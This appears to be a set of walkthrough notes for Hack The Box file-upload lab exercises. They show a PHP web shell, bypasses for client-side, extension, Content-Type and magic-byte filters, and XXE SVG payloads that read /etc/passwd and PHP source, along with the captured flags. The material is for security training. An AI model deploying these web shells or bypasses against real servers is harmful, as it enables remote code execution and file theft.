FILE UPLOAD ATTACKS

ABSENT VALIDATION

Try to upload a PHP script that executes the (hostname) command on the back-end server, and submit the first word of it as the answer.

#determine the language the webapp runs on
root@oco:~$ BROWSER > {targetSite:port} > wappalyzer
 * JavaScript Libraries: JQuery 2.1.3
 
#test whether you can upload a file with the same extension
root@oco:~$ nano test.php
 <?php echo "test";?>

root@oco:~$ BROWSER > {targetSite:port} > upload
 * File successfully uploaded
 * this means that the web application has no file validation on the back-end

#
root@oco:~$ nano fua.php
 <?php system('hostname', $hostnameValue); echo $hostnameValue;?>
 
root@oco:~$ BROWSER > {targetSite:port} > upload
root@oco:~$ BROWSER > {targetSite:port}/uploads/fua.php
 * ng-53539-fileuploadsabsentverification-4wbed-595d9cf54c-xwx95 0

UPLOAD EXPLOITATION

Try to exploit the upload feature to upload a web shell and get the content of /flag.txt

#determine the language the webapp runs on
root@oco:~$ BROWSER > {targetSite:port} > wappalyzer
 * JavaScript Libraries: JQuery 2.1.3
 
#test whether you can upload a file with the same extension
root@oco:~$ nano test.php
 <?php echo "test";?>

root@oco:~$ BROWSER > {targetSite:port} > upload
 * File successfully uploaded
 * this means that the web application has no file validation on the back-end

#
root@oco:~$ nano phpShell.php
 <?php system($_REQUEST['cmd']); ?>
 * this uses the system() function to execute system cmds and prints their output
    - it then passes the output to the cmd parameter with $_REQUEST['cmd']
root@oco:~$ BROWSER > {targetSite:port} > upload

#usage
root@oco:~$ BROWSER > {targetSite:port}/uploads/shell.php > CTRL+U
view-source:http://94.237.53.203:54323/uploads/phpShell.php?cmd=cat /flag.txt
 * HTB{g07_my_f1r57_w3b_5h3ll}
 * try using the source code view [CTRL+U] when executing these
 * the source-view shows the command output as it would be shown in the terminal, without any HTML rendering

CLIENT-SIDE VALIDATION

Try to bypass the client-side file type validations in the above exercise, then upload a web shell to read /flag.txt (try both bypass methods for better practice)

Method 1:

root@oco:~$ BROWSER > {targetSite:port} > CTRL+SHIFT+C > click on the profile image/browse upload button
 * this opens the dev page inspector and will highlight the HTML file input
    - <input type="... accept=".jpg,.jpeg,.png"> == $0
       - can change this to "All Files"
#read how the upload validates the file upload
#the validation occurs in if(validate()){upload()}
root@oco:~$ BROWSER > {targetSite:port} > Console (CTRL+SHIFT+K)
 > validate()
    function validate() {
      var file = $("#uploadFile")[0].files[0];
      var filename = file.name;
      var extension = filename.split('.').pop();

      if (extension !== 'jpg' && extension !== 'jpeg' && extension !== 'png') {
        $('#error_message').text("Only images are allowed!");
        File.form.reset();
        $("#submit").attr("disabled", true);
        return false;
      } 
      else {
        return true;
      }
    }
 
 * The key thing from this function is where it checks whether the file extension
   is an image, and if it is not, it prints the error message 
   (Only images are allowed!) and disables the Upload button
   
 Modification: Method 1 - rewrite the JS Code to accept php files
 
 if (... && extension !== 'php')
 * save the via CTRL+S to affect change then hit the upload button
 
 Modification: Method 2 - replace the validation <form action="... onsubmit="if(validate()){upload()}">
 
 onsubmit="window.location.reload()"
 * to affect change, hit the upload button
 
root@oco:~$ BROWSER > http://94.237.62.166:38499/profile_images/phpShell.php?cmd=id

 * HTB{cl13n7_51d3_v4l1d4710n_w0n7_570p_m3}

Method 2:

root@oco:~$ nano phpShell.php
 <?php system($_REQUEST['cmd']); ?>
 * this uses the system() function to execute system cmds and prints their output
    - it then passes the output to the cmd parameter with $_REQUEST['cmd']

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 upload field: {select image to upload}
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  
  ------WebKitFormBoundary6f8Db2bmnpKY9rBp
  Content-Disposition: form-data; name="uploadFile"; filename="test.jpg"
  Content-Type: image/jpeg

  ...encoded blurb content of test.jpg...
  ...
  ------WebKitFormBoundary6f8Db2bmnpKY9rBp--


  Modification

   ------WebKitFormBoundary6f8Db2bmnpKY9rBp
   Content-Disposition: form-data; name="uploadFile"; filename="phpShell.php"
   Content-Type: image/jpeg
  * delete the encoded blurb specific to "test.jpg"
  * add in the contents of the php web shell <?php system($_REQUEST['cmd']); ?>
     - the web shell must be in the same directory where the test.jpg file is located
  
  * may also modify the Content-Type of the uploaded file to
     - application/x-www-form-urlencoded --> verify
     
   ------WebKitFormBoundary6f8Db2bmnpKY9rBp--
    
 Response
  ...
  no errors means the back-end server took the uploaded web shell

# Directory & FILE enumeration using FFUF
root@oco:~$ find / -iname directory-list* -type f 2>/dev/null
 * /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt .
root@oco:~$ BROWSER > {targetSite:port}
 * review the source code to get an idea of where the images will be stored
    - /profile_images/
root@oco:~$ nano directory-list-2.3-small.txt
 profile_images
 phpShell

root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://94.237.62.166:38499/FUZZ -recursion -recursion-depth 1 -e .php -v -ic -t 100 -mc 200
 * the -recursion flag enables recursive scanning
 * the -recursion-depth flag specifies the depth of the recursive scan
    - this cmd specifically fuzzes the main directories and their subdirectories
 * the -e flag specifies the extension
 * the -v flag signifies verbose which outputs the full URL
 * the -ic flag removes wordlist comments
 * -mc 200 means to match using HTTP status code of 200 OK
 
 * identified /profile_images/

#find where the phpShell was stored in the backend server
root@oco:~$ sudo nano findMyWebShell.txt
 phpShell
 * enter the filename of your reverse shell
root@oco:~$ cat findMyWebShell.txt                          
 phpShell

# FILE ENUMERATION USING FFUF
root@oco:~$ ffuf -w findMyWebShell.txt -u http://94.237.62.166:38499/profile_images/FUZZ -e .php -mc 200
 * ALT: CTRL+SHIFT+C then click on the profile image. the URL where the web shell was uploaded will be displayed

#usage
root@oco:~$ BROWSER > {targetSite:port}/profile_images/phpShell.php?cmd=id
 * try using the source code view [CTRL+U] when executing these
 * the source-view shows the command output as it would be shown in the terminal, without any HTML rendering
 
 * HTB{cl13n7_51d3_v4l1d4710n_w0n7_570p_m3}

BLACKLIST FILTERS

Try to find an extension that is not blacklisted and can execute PHP code on the web server, and use it to read "/flag.txt"

root@oco:~$ nano phpShell.jpg
 <?php system($_REQUEST['cmd']); ?>
 
root@oco:~$ curl -O https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst

#
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 upload field: {select image to upload}
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw > right-click > Send to Intruder
 Request
  ...
  
 ------WebKitFormBoundaryP8S8EydB15hQ1DB1
 Content-Disposition: form-data; name="uploadFile"; filename="phpShell.jpg"
 Content-Type: image/jpeg

 <?php system($_REQUEST['cmd']); ?>
 ------WebKitFormBoundaryP8S8EydB15hQ1DB1--

BURP > Intruder
 Positions
  Attack Type: Sniper
  Payload Positions: phpShell$.jpg$
   - be sure to Clear any automatically set positions
   - highlight .jpg and select "Add" to add it as a fuzzing position
 Payloads
  Payload Sets: default
  Payload Settings > Load > extensions.lst
  Payload Processing: default
  Payload Encoding
   URL-encode these characters: disabled
    - this avoids encoding the (.) before the file extension
 Start Attack!
 
Burp > Intruder Attack of http://{targetSite:port} > Response
 * sort the results by Length to see all the extensions that have passed validation
    - the response should be file successfully uploaded
 * Not all extensions that passed validation will work with all web server configurations, you will need to try several extensions to get one that successfully executes PHP code. 
 
Burp > Intruder Attack of http://{targetSite:port} > Response > right-click successful request > Send to Repeater
 ------WebKitFormBoundaryzBYikKv2dyokSEDU
 Content-Disposition: form-data; name="uploadFile"; filename="phpShell.phar"
 Content-Type: image/jpeg

 <?php system($_REQUEST['cmd']); ?>

 ------WebKitFormBoundaryzBYikKv2dyokSEDU--

 * change the filename and extension as well as the content
 * the .phtml extension is often allowed by web servers for code execution rights

root@oco:~$ BROWSER > {targetSite:port}/profile_images/phpShell.php?cmd=id
 * HTB{1_c4n_n3v3r_b3_bl4ckl1573d}

WHITELIST FILTERS

The above exercise employs a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to upload a PHP script and execute code to read "/flag.txt"

root@oco:~$ nano phpShell.jpg
 <?php system($_REQUEST['cmd']); ?>

#fuzz for allowable extensions
#step 1: fuzz the upload functionality with a list of potential extensions and 
#see which of them return an error message. Any upload requests that do not return 
#an error message, return a different message, or succeed in uploading the file, may 
#indicate an allowed file extension
root@oco:~$ curl -O https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst

#
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 upload field: {select image to upload}
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw > right-click > Send to Intruder
 Request
  ...
  
 ------WebKitFormBoundaryP8S8EydB15hQ1DB1
 Content-Disposition: form-data; name="uploadFile"; filename="phpShell.jpg"
 Content-Type: image/jpeg

 <?php system($_REQUEST['cmd']); ?>
 ------WebKitFormBoundaryP8S8EydB15hQ1DB1--

BURP > Intruder
 Positions
  Attack Type: Sniper
  Payload Positions: phpShell$.jpg$
   - be sure to Clear any automatically set positions
   - highlight .jpg and select "Add" to add it as a fuzzing position
 Payloads
  Payload Sets: default
  Payload Settings > Load > web-extensions.txt
  Payload Processing: default
  Payload Encoding
   URL-encode these characters: disabled
    - this avoids encoding the (.) before the file extension
 Start Attack!
Burp > Intruder Attack of http://{targetSite:port} > Response
 * sort the results by Length to see all the extensions that have passed validation
    - the response should be file successfully uploaded
 * Not all extensions that passed validation will work with all web server configurations, you will need to try several extensions to get one that successfully executes PHP code. 

Burp > Intruder Attack of http://{targetSite:port} > Response > right-click successful request > Send to Repeater
 ------WebKitFormBoundaryzBYikKv2dyokSEDU
 Content-Disposition: form-data; name="uploadFile"; filename="phpShell.phar.jpg"
 Content-Type: image/jpeg

 <?php system($_REQUEST['cmd']); ?>

 ------WebKitFormBoundaryzBYikKv2dyokSEDU--

 * change the filename and extension as well as the content
    - utilize reverse double extension if required
    - if php.jpg is not allowed, try phar.jpg, etc
 * the .phtml extension is often allowed by web servers for code execution rights
 
root@oco:~$ curl http://83.136.254.158:50122/profile_images/phpShell.phar.jpg?cmd=id
 * uid=33(www-data) gid=33(www-data) groups=33(www-data)

root@oco:~$ curl http://83.136.254.158:50122/profile_images/phpShell.phar.jpg?cmd=cat%20%2Fflag.txt
 * HTB{1_wh173l157_my53lf}

TYPE FILTERS

The above server employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt"

#step 1: fuzz for the Content-Type header to see which types are allowed
root@oco:~$ curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Discovery/Web-Content/web-all-content-types.txt
root@oco:~$ cat content-type.txt | grep 'image/' > image-content-types.txt
root@oco:~$ nano image-content-types.txt
 image/jpg
 * the error messages you receive from the server can provide insights into which types are allowed
   and it can be used to limit what to fuzz for

root@oco:~$ nano phpShell.jpg
 <?php system($_REQUEST['cmd']); ?>
 
#fuzz for allowable content type
#step 1: fuzz the upload functionality with a list of potential extensions and 
#see which of them return an error message. Any upload requests that do not return 
#an error message, return a different message, or succeed in uploading the file, may 
#indicate an allowed file extension
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 upload field: {select image to upload}
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw > right-click > Send to Intruder
 Request
  ...
  
 ------WebKitFormBoundaryP8S8EydB15hQ1DB1
 Content-Disposition: form-data; name="uploadFile"; filename="phpShell.jpg"
 Content-Type: §image/png§

 <?php system($_REQUEST['cmd']); ?>
 ------WebKitFormBoundaryP8S8EydB15hQ1DB1--
 
BURP > Intruder
 Positions
  Attack Type: Sniper
  Payload Positions: real-image.jpg
   Content-Type: §image/jpeg§
   - be sure to Clear any automatically set positions
   - highlight image/jpeg keyword and select "Add" to add it as a fuzzing position
      - Content-Type: §image/jpeg§
 Payloads
  Payload Sets: default
  Payload Settings > Load > image-content-types.txt
  Payload Processing: default
  Payload Encoding
   URL-encode these characters: disabled
    - this avoids encoding the (.) before the file extension
 Start Attack!
  * if nothing is found add magic bytes to the beginning of the file
     - GIF (GIF87a, GIF89a)
  * allowed image/jpeg, image/png, image/gif
 
#modify the payload by adding magic bytes
root@oco:~$ nano phpShell.jpg
 GIF87a
 <?php system($_REQUEST['cmd']); ?>
 * the GIF87a is a magic byte 
 
 
#upload the modified phpShell
Burp > Intruder Attack of http://{targetSite:port} > Response
 * sort the results by Length to see all the allowed content types
    - the response should be file successfully uploaded
 * Not all extensions that passed validation will work with all web server configurations, you will need to try several extensions to get one that successfully executes PHP code. 
Burp > Intruder Attack of http://{targetSite:port} > Response > right-click successful request > Send to Repeater 
 ------WebKitFormBoundaryzBYikKv2dyokSEDU
 Content-Disposition: form-data; name="uploadFile"; filename="phpShell.jpg.phar"
 Content-Type: image/jpeg

 GIF87a
 <?php system($_REQUEST['cmd']); ?>

 ------WebKitFormBoundaryzBYikKv2dyokSEDU--
 
#access the uploaded shell from within Burp Suite
Burp > Intruder Attack of http://{targetSite:port} > Response
 * sort the results by Length to see all the allowed content types
    - the response should be file successfully uploaded
 * Not all extensions that passed validation will work with all web server configurations, you will need to try several extensions to get one that successfully executes PHP code. 
Burp > Intruder Attack of http://{targetSite:port} > Response > right-click successful request > Send to Repeater
 GET /profile_images/phpShell.jpg.phar?cmd=cat%20%2Fflag.txt HTTP/1.1
 * simply change the POST /upload.php .... to GET /profile_images....
 
 ------WebKitFormBoundaryzBYikKv2dyokSEDU
 Content-Disposition: form-data; name="uploadFile"; filename="phpShell.jpg.phar"
 Content-Type: image/jpeg

 GIF87a
 <?php system($_REQUEST['cmd']); ?>

 ------WebKitFormBoundaryzBYikKv2dyokSEDU--
 * HTB{m461c4l_c0n73n7_3xpl0174710n}

LIMITED FILE UPLOADS

The above exercise contains an upload functionality that should be secure against arbitrary file uploads. Try to exploit it using one of the attacks shown in this section to read "/flag.txt"

root@oco:~$ nano svgImage.svg
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
 <svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
  <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
  &xxe;
 </svg>
 
root@oco:~$ curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Discovery/Web-Content/web-extensions.txt
root@oco:~$ nano web-extensions.txt
 .svg

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 upload field: {select image to upload}
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw > right-click > Send to Intruder
 Request
  ...
  
 ------WebKitFormBoundary9kjDs6ayGtSNeEGv
 Content-Disposition: form-data; name="uploadFile"; filename="svgImage.§svg§"
 Content-Type: image/svg+xml

 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
 <svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
  <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
  &xxe;
 </svg>

 ------WebKitFormBoundary9kjDs6ayGtSNeEGv--

BURP > Intruder
 Positions
  Attack Type: Sniper
  Payload Positions: svgImage$.svg$
   - be sure to Clear any automatically set positions
   - highlight .jpg and select "Add" to add it as a fuzzing position
 Payloads
  Payload Sets: default
  Payload Settings > Load > web-extensions.txt
  Payload Processing: default
  Payload Encoding
   URL-encode these characters: disabled
    - this avoids encoding the (.) before the file extension
 Start Attack!
 
Burp > Intruder Attack of http://{targetSite:port} > Response
 * sort the results by Length to see all the extensions that have passed validation
    - the response should be file successfully uploaded
	- found .svg files can be uploaded
	
Burp > Intruder Attack of http://{targetSite:port} > Response > right-click successful request > Send to Repeater

------WebKitFormBoundary9kjDs6ayGtSNeEGv
Content-Disposition: form-data; name="uploadFile"; filename="svgImage..svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
 <svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
  <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
  &xxe;
 </svg>

------WebKitFormBoundary9kjDs6ayGtSNeEGv--

Send
 * File successfully uploaded
 
root@oco:~$ curl -v http://94.237.60.154:32295
 * HTB{my_1m4635_4r3_l37h4l}

Try to read the source code of 'upload.php' to identify the uploads directory, and use its name as the answer. (write it exactly as found in the source, without quotes)

root@oco:~$ nano svgImage.svg
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
 <svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
  <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
  &xxe;
 </svg>
 
root@oco:~$ curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Discovery/Web-Content/web-extensions.txt
root@oco:~$ nano web-extensions.txt
 .svg

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 upload field: {select image to upload}
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw > right-click > Send to Intruder
 Request
  ...
  
 ------WebKitFormBoundary9kjDs6ayGtSNeEGv
 Content-Disposition: form-data; name="uploadFile"; filename="svgImage.§svg§"
 Content-Type: image/svg+xml

 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
 <svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
  <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
  &xxe;
 </svg>

 ------WebKitFormBoundary9kjDs6ayGtSNeEGv--

BURP > Intruder
 Positions
  Attack Type: Sniper
  Payload Positions: svgImage$.svg$
   - be sure to Clear any automatically set positions
   - highlight .jpg and select "Add" to add it as a fuzzing position
 Payloads
  Payload Sets: default
  Payload Settings > Load > web-extensions.txt
  Payload Processing: default
  Payload Encoding
   URL-encode these characters: disabled
    - this avoids encoding the (.) before the file extension
 Start Attack!
 
Burp > Intruder Attack of http://{targetSite:port} > Response
 * sort the results by Length to see all the extensions that have passed validation
    - the response should be file successfully uploaded
	- found .svg files can be uploaded
	
Burp > Intruder Attack of http://{targetSite:port} > Response > right-click successful request > Send to Repeater

------WebKitFormBoundary9kjDs6ayGtSNeEGv
Content-Disposition: form-data; name="uploadFile"; filename="svgImage..svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
 <svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
  <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
  &xxe;
 </svg>

------WebKitFormBoundary9kjDs6ayGtSNeEGv--

Send
 * File successfully uploaded
 
root@oco:~$ curl -v http://94.237.60.154:32295
 * PD9waHAKbGlieG1sX2Rpc2FibGVfZW50aXR5X2xvYWRlcihmYWxzZSk7Cgokc3ZnX2ZpbGUgPSBmaWxlX2dldF9jb250ZW50cygnLi9pbWFnZXMvJyAuIGZpbGVfZ2V0X2NvbnRlbnRzKCcuL2ltYWdlcy9sYXRlc3QueG1sJykpOwokZG9jID0gbmV3IERPTURvY3VtZW50KCk7CiRkb2MtPmxvYWRYTUwoJHN2Z19maWxlLCBMSUJYTUxfTk9FTlQgfCBMSUJYTUxfRFRETE9BRCk7CiRzdmcgPSAkZG9jLT5nZXRFbGVtZW50c0J5VGFnTmFtZSgnc3ZnJyk7Cj8+Cgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPgoKPGhlYWQ+CiAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPgogIDx0aXRsZT5FbXBsb3llZSBGaWxlIE1hbmFnZXI8L3RpdGxlPgogIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iLi9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICA8c2NyaXB0IHNyYz0naHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzIuMS4zL2pxdWVyeS5taW4uanMnPjwvc2NyaXB0PgogIDxzY3JpcHQgc3JjPSIuL3NjcmlwdC5qcyI+PC9zY3JpcHQ+CiAgPGRpdj4KICAgIDxoMT5VcGRhdGUgeW91ciBsb2dvPC9oMT4KICAgIDxjZW50ZXI+CiAgICAgIDxmb3JtIGFjdGlvbj0idXBsb2FkLnBocCIgbWV0aG9kPSJQT1NUIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBpZD0idXBsb2FkRm9ybSI+CiAgICAgICAgPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9InVwbG9hZEZpbGUiIGlkPSJ1cGxvYWRGaWxlIiBhY2NlcHQ9Ii5zdmciPgogICAgICAgIDw/cGhwIGVjaG8gJHN2Zy0+aXRlbSgwKS0+QzE0TigpOyA/PgogICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQiIGlkPSJzdWJtaXQiPgogICAgICA8L2Zvcm0+CiAgICA8L2NlbnRlcj4KICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPg==
 
root@oco:~$ echo PD9waHAKbGlieG1sX2Rpc2FibGVfZW50aXR5X2xvYWRlcihmYWxzZSk7Cgokc3ZnX2ZpbGUgPSBmaWxlX2dldF9jb250ZW50cygnLi9pbWFnZXMvJyAuIGZpbGVfZ2V0X2NvbnRlbnRzKCcuL2ltYWdlcy9sYXRlc3QueG1sJykpOwokZG9jID0gbmV3IERPTURvY3VtZW50KCk7CiRkb2MtPmxvYWRYTUwoJHN2Z19maWxlLCBMSUJYTUxfTk9FTlQgfCBMSUJYTUxfRFRETE9BRCk7CiRzdmcgPSAkZG9jLT5nZXRFbGVtZW50c0J5VGFnTmFtZSgnc3ZnJyk7Cj8+Cgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPgoKPGhlYWQ+CiAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPgogIDx0aXRsZT5FbXBsb3llZSBGaWxlIE1hbmFnZXI8L3RpdGxlPgogIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iLi9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICA8c2NyaXB0IHNyYz0naHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzIuMS4zL2pxdWVyeS5taW4uanMnPjwvc2NyaXB0PgogIDxzY3JpcHQgc3JjPSIuL3NjcmlwdC5qcyI+PC9zY3JpcHQ+CiAgPGRpdj4KICAgIDxoMT5VcGRhdGUgeW91ciBsb2dvPC9oMT4KICAgIDxjZW50ZXI+CiAgICAgIDxmb3JtIGFjdGlvbj0idXBsb2FkLnBocCIgbWV0aG9kPSJQT1NUIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBpZD0idXBsb2FkRm9ybSI+CiAgICAgICAgPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9InVwbG9hZEZpbGUiIGlkPSJ1cGxvYWRGaWxlIiBhY2NlcHQ9Ii5zdmciPgogICAgICAgIDw/cGhwIGVjaG8gJHN2Zy0+aXRlbSgwKS0+QzE0TigpOyA/PgogICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQiIGlkPSJzdWJtaXQiPgogICAgICA8L2Zvcm0+CiAgICA8L2NlbnRlcj4KICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPg== | base64 -d
 * ./images/

PreviousCOMMAND INJECTIONS NextSERVER-SIDE ATTACKS

Last updated 3 months ago